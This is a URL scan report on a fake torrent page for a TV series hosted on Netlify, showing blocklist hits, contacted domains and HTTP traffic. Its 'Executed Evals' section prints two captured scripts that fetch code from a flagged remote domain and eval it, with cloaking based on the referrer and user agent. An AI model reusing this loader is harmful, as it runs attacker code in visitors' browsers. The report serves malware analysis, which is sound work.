Overview

URLgoodrubank.netlify.app/velichne-stolttya-roksolana-123-serya-torrent.html
IP 34.159.75.132 (Germany)
ASN#396982 GOOGLE-CLOUD-PLATFORM
UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer
Report completed2022-12-06 00:00:25 UTC
StatusLoading report..
IDS alerts0
Blocklist alert3
urlquery alerts No alerts detected
Tags None

Domain Summary (14)

Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
goodrubank.netlify.app (14) 0 No data No data 35.246.229.114 Unknown ranking
push.services.mozilla.com (1) 2140 2014-10-24 08:27:06 UTC 2020-05-03 10:09:39 UTC 52.89.136.7
goodrubank.netlify.com (1) 0 No data No data 34.159.25.198 Domain (netlify.com) ranked at: 17091
img-getpocket.cdn.mozilla.net (4) 1631 2018-06-21 23:36:00 UTC 2020-02-19 04:43:25 UTC 34.120.237.76
contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-12-05 04:09:48 UTC 34.117.237.239
images.1plus1.ua (1) 0 2017-02-08 15:19:04 UTC 2022-11-02 11:20:37 UTC 195.137.240.21 Domain (1plus1.ua) ranked at: 123834
content-signature-2.cdn.mozilla.net (1) 1152 No data No data 34.160.144.191
ocsp.globalsign.com (2) 2075 2012-07-20 17:46:16 UTC 2020-05-02 20:58:10 UTC 104.18.20.226
pimg.mycdn.me (1) 61276 2017-01-30 06:11:53 UTC 2022-11-24 23:31:36 UTC 217.20.152.213
lurgee.download (1) 0 2018-09-20 21:40:33 UTC 2022-11-19 06:03:06 UTC 188.114.97.1 Unknown ranking
r3.o.lencr.org (7) 344 No data No data 23.36.76.226
ocsp.digicert.com (6) 86 2012-05-21 07:02:23 UTC 2020-05-02 20:58:10 UTC 93.184.220.29
firefox.settings.services.mozilla.com (2) 867 2020-06-04 20:08:41 UTC 2022-12-05 04:09:09 UTC 34.102.187.140
thumbnails.videomore.ru (1) 0 2014-05-06 02:12:05 UTC 2021-01-08 18:04:37 UTC 94.140.201.40 Domain (videomore.ru) ranked at: 201237

Network Intrusion Detection Systemsinfo

Suricata /w Emerging Threats Pro
 No alerts detected

Blocklists

OpenPhish
 No alerts detected

PhishTank
 No alerts detected

Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-12-06 2 goodrubank.netlify.app/velichne-stolttya-roksolana-123-serya-torrent.html Malware
2022-12-06 2 goodrubank.netlify.app/velichne-stolttya-roksolana-123-serya-torrent.html Malware
2022-12-06 2 lurgee.download/?aHtjLiGTE=FhUIWE5XWlIJSUNHC1dABEBEUEEdEwYGEFxWRwEIFQNTRlwF (...) Malware

mnemonic secure dns
 No alerts detected

Quad9 DNS
 No alerts detected


Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 34.159.75.132
Date UQ / IDS / BL URL IP
2023-02-09 04:35:00 +0000 0 - 4 - 0 goofy-allen-ab43b9.netlify.app/ 34.159.75.132
2023-02-09 02:46:21 +0000 0 - 4 - 3 kind-hypatia-39bd3e.netlify.app/ 34.159.75.132
2023-02-07 22:08:22 +0000 0 - 5 - 2 naughty-panini-569ca0.netlify.app/ 34.159.75.132
2023-02-05 01:04:20 +0000 0 - 0 - 162 mintwallet.netlify.app/ 34.159.75.132
2023-02-04 17:33:39 +0000 0 - 2 - 0 victoradekunle.com/ 34.159.75.132


Last 5 reports on ASN: GOOGLE-CLOUD-PLATFORM
Date UQ / IDS / BL URL IP
2023-02-09 13:00:50 +0000 0 - 0 - 2 belvoirty.com/?a=6196&oc=16718&c=45739&m=3&s1 (...) 34.91.53.57
2023-02-09 12:54:15 +0000 0 - 1 - 0 track.wargaming-aff.com/click?pid=5560&offer_ (...) 35.204.100.195
2023-02-09 12:52:46 +0000 0 - 0 - 6 34.74.120.163/PMA2011/index.php 34.74.120.163
2023-02-09 12:40:40 +0000 0 - 0 - 9 pristineplace.us/1uee7/OfficeV4%202.zip 34.91.95.185
2023-02-09 11:35:38 +0000 0 - 0 - 1 r.goaffmy.com/click?pid=9980&offer_id=2359&su (...) 34.141.137.168


Last 1 reports on domain: goodrubank.netlify.app
Date UQ / IDS / BL URL IP
2022-12-06 00:00:25 +0000 0 - 0 - 3 goodrubank.netlify.app/velichne-stolttya-roks (...) 34.159.75.132


No other reports with similar screenshot

JavaScript

Executed Scripts (1)

Executed Evals (2)
#1 JavaScript::Eval (size: 574) - SHA256: 41d7bbe39394c4da813ed50ce5d73ea6d512e1c27cb7f7ddd24f716da34d92df
var xhr = new XMLHttpRequest();
xhr.open('GET', '//lurgee.download/?aHtjLiGTE=FhUIWE5XWlIJSUNHC1dABEBEUEEdEwYGEFxWRwEIFQNTRlwFHAFWQVUJEFAKEF0FEw0FEFUGR1RRQABSQFoFSkMHCBBYUhEAABwNABdRCRFUUBdRARMAVBABVUdcDhUFV0YABxwHBUEJCxBWAxABUh0QVgUUV1ITUVVBAAAdVFFDAVkQXVIRXAAcUQIXV1wRUgUXV1MTBgYQB1RHAQgVAwJGXAUcAQRPAAsGGRdRCRFXBBdRARMAAxABVUddCBUFV0YBAxwHBUEJXx4XVgUcVQQQVgUUVAcTUVRBWlUdVFBDWwgQXVMRBgQcUQIXV10RUgQXDQMaUQAZVUgwMAsDTUpSCBsLUwVdHQsZAx5HTBlkYB4ZHUIHTkEWQVEEHQMAJw==');
xhr.withCredentials = true;
xhr.onload = function() {
    var ref = document.referrer;
    eval(xhr.responseText);
};
xhr.send();
#2 JavaScript::Eval (size: 1788) - SHA256: 46039cfe759ed546486f6cc0c3d5349d611568dbe4999dc8d168a25185d2e31e
if (window.location.href.indexOf("#") != -1 && (window.location.href.indexOf("=") > window.location.href.indexOf("#"))) {
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "//lurgee.download/?VGEPGseFDp_" + window.location.href.substring(window.location.href.indexOf("#") + 1, window.location.href.length) + "&ref=" + document.referrer.split("?")[0]);
    xhr.onload = function() {
        var ref = document.referrer.split("?")[0];
        eval(xhr.responseText);
    };
    xhr.send();
} else {
    if (ref.length > 0) {
        if (!(!(ref.indexOf("yandex.") > 0) && !(ref.indexOf("google.") > 0) && !(ref.indexOf("rambler.") > 0) && !(ref.indexOf("bing.") > 0) && !(ref.indexOf("mail.") > 0) && !(ref.indexOf("yahoo.") > 0) && !(ref.indexOf("msn.") > 0) && !(ref.indexOf("aol.") > 0) && !(ref.indexOf("duckduckgo.") > 0) && !(ref.indexOf("live.") > 0))) {
            (0 <= window.navigator.userAgent.indexOf("Rambler") || 0 <= window.navigator.userAgent.indexOf("Yandex") || 0 <= window.navigator.userAgent.indexOf("Google") || 0 <= window.navigator.userAgent.indexOf("Yaho") || 0 <= window.navigator.userAgent.indexOf("Googlebot") || 0 <= window.navigator.userAgent.indexOf("Turtle")) && Break();
            if (s_num == null) {
                var s_num = 1;
            } else {
                s_num++;
            }
            if (sub == null) var sub = 0;
            if (s_num < 2) {
                var xhr = new XMLHttpRequest();
                xhr.open('GET', '//lurgee.download/?aHtjLiGTE=FhUIWE5XWlIJSUNHC1dABEBEUEEdEwYGEFxWRwEIFQNTRlwFHAFWQVUJEFAKEF0FEw0FEFUGR1RRQABSQFoFSkMHCBBYUhEAABwNABdRCRFUUBdRARMAVBABVUdcDhUFV0YABxwHBUEJCxBWAxABUh0QVgUUV1ITUVVBAAAdVFFDAVkQXVIRXAAcUQIXV1wRUgUXV1MTBgYQB1RHAQgVAwJGXAUcAQRPAAsGGRdRCRFXBBdRARMAAxABVUddCBUFV0YBAxwHBUEJXx4XVgUcVQQQVgUUVAcTUVRBWlUdVFBDWwgQXVMRBgQcUQIXV10RUgQXDQMaUQAZVUgwMAsDTUpSCBsLUwVdHQsZAx5HTBlkYB4ZHUIHTkEWQVEEHQMAJw==&ref=' + ref.split('?')[0]);
                xhr.withCredentials = true;
                xhr.onload = function() {
                    var ref = document.referrer.split('?')[0];
                    eval(xhr.responseText);
                };
                xhr.send();
            }
        }
    }
}

Executed Writes (0)


HTTP Transactions (43)


Request Response
                                        
                                            GET /velichne-stolttya-roksolana-123-serya-torrent.html HTTP/1.1 
Host: goodrubank.netlify.app
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

search
                                         35.246.229.114
HTTP/1.1 301 Moved Permanently
Content-Type: text/plain; charset=utf-8
                                        
Location: https://goodrubank.netlify.app/velichne-stolttya-roksolana-123-serya-torrent.html
Server: Netlify
X-Nf-Request-Id: 01GKJBQ9GG651775HR81FTQJV9
Date: Tue, 06 Dec 2022 00:00:13 GMT
Content-Length: 96


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   96
Md5:    171ab18c1b1e2603ebea7ff336560c3b
Sha1:   2924b4cb5bb66a3711d99b64477a05d288adbb37
Sha256: a0384eaa5e1833ffa40f45044a7675bcb76baf3905e1258a925340e4c1391f84

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "1BAD6C06AA3E88DCBC125FC98A6CB753EB2B18D2C8DD61DA21D12209AEEDA3F9"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10842
Expires: Tue, 06 Dec 2022 03:00:56 GMT
Date: Tue, 06 Dec 2022 00:00:14 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 1137
Cache-Control: max-age=125402
Date: Tue, 06 Dec 2022 00:00:14 GMT
Etag: "638dc877-1d7"
Expires: Wed, 07 Dec 2022 10:50:16 GMT
Last-Modified: Mon, 05 Dec 2022 10:31:19 GMT
Server: ECS (ska/F711)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Retry-After, Alert, Backoff, Content-Length, Content-Type
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Mon, 05 Dec 2022 23:20:20 GMT
cache-control: public,max-age=3600
age: 2394
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    14cd9a0afb6ba9a763651d5112760d1e
Sha1:   75d7b104ab9ab11fbb73c3f348b43b0119b5adfa
Sha256: 4e32a117106be587ffcd63239c16a8117eb7840830d4c9decf6527761967532e
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "7D7232C8C91BCD18161BA2C9D23E3BFF159604E058BD5B3FC1C7FCBCD03A7EE3"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13403
Expires: Tue, 06 Dec 2022 03:43:37 GMT
Date: Tue, 06 Dec 2022 00:00:14 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2023-01-19-10-06-33.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
x-amz-id-2: 6S7fvcgkvyAdLgT8MMHPO4wq7HIKdZQVvEjgZ3dhNEWBCPkHrU/RuTQWLd+jlwq4ck9L0N1IOcM=
x-amz-request-id: CN9VCQWVD8WT8BJT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Mon, 05 Dec 2022 23:48:42 GMT
age: 692
last-modified: Wed, 30 Nov 2022 10:06:34 GMT
etag: "53341dea33f4f3d9b4966f80589f429a"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    53341dea33f4f3d9b4966f80589f429a
Sha1:   20f7b07c686c986d2ed1e3e9ad1bb2aef8edaf0d
Sha256: 651683e52cdbc96b289f8f123155f0b96d9f67432689e89156fa56f5a346c6a0
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5937
Cache-Control: max-age=113643
Date: Tue, 06 Dec 2022 00:00:14 GMT
Etag: "638d87c8-139"
Expires: Wed, 07 Dec 2022 07:34:17 GMT
Last-Modified: Mon, 05 Dec 2022 05:55:20 GMT
Server: ECS (amb/6BBD)
X-Cache: HIT
Content-Length: 313

                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Tue, 06 Dec 2022 00:00:14 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /velichne-stolttya-roksolana-123-serya-torrent.html HTTP/1.1 
Host: goodrubank.netlify.app
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

search
                                         35.246.229.114
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
age: 4
cache-control: public, max-age=0, must-revalidate
content-encoding: br
date: Tue, 06 Dec 2022 00:00:10 GMT
etag: "41bbe28ad6dea80fb4f57199a2ce94da-ssl-df"
server: Netlify
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept-Encoding
x-nf-request-id: 01GKJBQ9XNTG9PTZ3Z47H3H80P
content-length: 6663
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (14879), with no line terminators
Size:   6663
Md5:    c0619ce49037e56e395465128fcfc95b
Sha1:   b15adfa3e5b2efdfd463f8428a6baa904548a15d
Sha256: c9c89db0d8a54d6727f352bd5dcaedf9247e824b3c58f63139b6c83ad2ed2144

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /gsrsaovsslca2018 HTTP/1.1 
Host: ocsp.globalsign.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 79
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         104.18.20.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 06 Dec 2022 00:00:14 GMT
Content-Length: 1432
Connection: keep-alive
Expires: Fri, 09 Dec 2022 21:37:42 GMT
ETag: "e4d0ada7818cb264d0aa41fde6f62863e432f8a6"
Last-Modified: Mon, 05 Dec 2022 21:37:43 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Age: 2972
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7750bd7b1c5afac4-OSL


--- Additional Info ---
Magic:  data
Size:   1432
Md5:    7264a9d2c71eac3baec2f49976f886b0
Sha1:   e4d0ada7818cb264d0aa41fde6f62863e432f8a6
Sha256: 589b79c6e89913b7db194328a8504bc66356230a8c5bb317ff7a2747136dc8b8
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "2118D51812D528C27325DB757223ED5E7745118E787F0AC3FBBE56B894E68085"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14481
Expires: Tue, 06 Dec 2022 04:01:35 GMT
Date: Tue, 06 Dec 2022 00:00:14 GMT
Connection: keep-alive

                                        
                                            GET /getImage?disableStub=true&type=VIDEO_S_720&url=http%3A%2F%2Fvdp.mycdn.me%2FgetImage%3Fid%3D289503774004%26idx%3D30%26thumbType%3D47%26f%3D1%26i%3D1&signatureToken=T7UB_8HqXZuUbBXaH9iV6w HTTP/1.1 
Host: pimg.mycdn.me
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://goodrubank.netlify.app/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         217.20.152.213
HTTP/2 200 OK
content-type: image/webp
                                        
server: apache
date: Tue, 06 Dec 2022 00:00:14 GMT
content-length: 17766
accept-ranges: bytes
last-modified: Fri, 07 Oct 2022 00:00:14 GMT
expires: Sat, 02 Sep 2023 00:00:14 GMT
cache-control: private, max-age=100000000
etag: "686897696a7c876b7e"
timing-allow-origin: *
access-control-allow-origin: *
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image, VP8 encoding, 720x405, Scaling: [none]x[none], YUV color, decoders should clamp\012- data
Size:   17766
Md5:    2f0f3a76a29d61200aa2d99e13531afa
Sha1:   4f5dfe8a4292d45550c1d232fc11431aa64c4c53
Sha256: b58d3c869057f653e8ae97a8498b6115dc318937b3e626d91849a9644b0990ae
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Content-Length, Pragma, Last-Modified, ETag, Alert, Expires, Retry-After, Cache-Control, Backoff, Content-Type
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Mon, 05 Dec 2022 23:11:19 GMT
cache-control: public,max-age=3600
age: 2935
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST /gsgccr3dvtlsca2020 HTTP/1.1 
Host: ocsp.globalsign.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 79
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         104.18.20.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 06 Dec 2022 00:00:14 GMT
Content-Length: 1414
Connection: keep-alive
Expires: Fri, 09 Dec 2022 22:51:56 GMT
ETag: "93a534ac540dd4651097977a4def05ad09e0bb45"
Last-Modified: Mon, 05 Dec 2022 22:51:57 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7750bd7b1e32b4e8-OSL


--- Additional Info ---
Magic:  data
Size:   1414
Md5:    31f649cdab769eed983daf3ced2bdd29
Sha1:   93a534ac540dd4651097977a4def05ad09e0bb45
Sha256: 4a4ac3dd70e8ca80852ce5973da15f4d06e1bc4a9e06e3be2204d32ff4c79463
                                        
                                            GET /uploads/programs_default/000/000/119/07e1cd7dca89a1678042477183b7ac3f_1405x650.jpg HTTP/1.1 
Host: images.1plus1.ua
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://goodrubank.netlify.app/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         195.137.240.21
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Tue, 06 Dec 2022 00:00:14 GMT
content-length: 120377
accept-ranges: bytes
last-modified: Tue, 31 Jan 2017 20:42:40 GMT
etag: "4bc655af1d9cbbacdd9acc98eb37179b"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
x-1p1-cdn: MISS; Tue, 06 Dec 2022 00:00:14 GMT
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1405x650, components 3\012- data
Size:   120377
Md5:    4bc655af1d9cbbacdd9acc98eb37179b
Sha1:   6dc494e261261733683aa4e29528c9b3016f455d
Sha256: c5e605c32b300cadb2b5a0b25e1beb33df1ade38ff83e4db8b0ba95cf57b76de
                                        
                                            GET /cRezFoL.png HTTP/1.1 
Host: goodrubank.netlify.app
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://goodrubank.netlify.app/5HqjCk.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         35.246.229.114
HTTP/2 200 OK
content-type: image/png
                                        
accept-ranges: bytes
age: 0
cache-control: public, max-age=0, must-revalidate
date: Tue, 06 Dec 2022 00:00:14 GMT
etag: "084eb62d9320eac543ad333d60e17ffb-ssl"
server: Netlify
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-nf-request-id: 01GKJBQAC67BMKK2835ZPH2YJG
content-length: 2991
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 14 x 69, 8-bit/color RGBA, non-interlaced\012- data
Size:   2991
Md5:    08465afce6ed9749f8a91d6cf97fd64d
Sha1:   c0f6153b68c0a73c8fca40c5941e1d5b60232def
Sha256: 76b247e19c18480003e0bf4cd79d21aed4200aee69136222e1e21f723b54f531
                                        
                                            GET /system/images/thumbs/31/12/1931231_big.jpg?1507632622 HTTP/1.1 
Host: thumbnails.videomore.ru
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://goodrubank.netlify.app/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         94.140.201.40
HTTP/1.1 200 OK
content-type: image/jpeg
                                        
server: nginx/1.20.2
date: Tue, 06 Dec 2022 00:00:14 GMT
transfer-encoding: chunked
last-modified: Sun, 24 Dec 2017 15:31:13 GMT
etag: W/"5a3fc841-550b"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
x-edge-cache: MISS
content-encoding: gzip


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 704x396, components 3\012- data
Size:   21713
Md5:    9387acb760481431b081c7489e3a3dc0
Sha1:   506e8a9be464a8690b844110d20fe32731f66110
Sha256: d8409c19bea56773de6647e5ff1f382e60491b7711bc3ff350c56cbf8287cfa3
                                        
                                            GET /ywnmV.jpg HTTP/1.1 
Host: goodrubank.netlify.app
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://goodrubank.netlify.app/5HqjCk.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         35.246.229.114
HTTP/2 200 OK
content-type: image/jpeg
                                        
accept-ranges: bytes
age: 0
cache-control: public, max-age=0, must-revalidate
date: Tue, 06 Dec 2022 00:00:14 GMT
etag: "f1b9c2df162cb9540c3d95fd78a4bd5b-ssl"
server: Netlify
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-nf-request-id: 01GKJBQAC2T6BA61M4R4MDE3X5
content-length: 322
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 4x4, components 3\012- data
Size:   322
Md5:    b2720e8bf076aea55a1707d2421b466f
Sha1:   f6f3a9c06c35d72e29ac35854a804104aca41d82
Sha256: b8a426cb57451fcc6cd68f752910b4fd7d9180051116a968dc7ee9aa66fe0d94
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
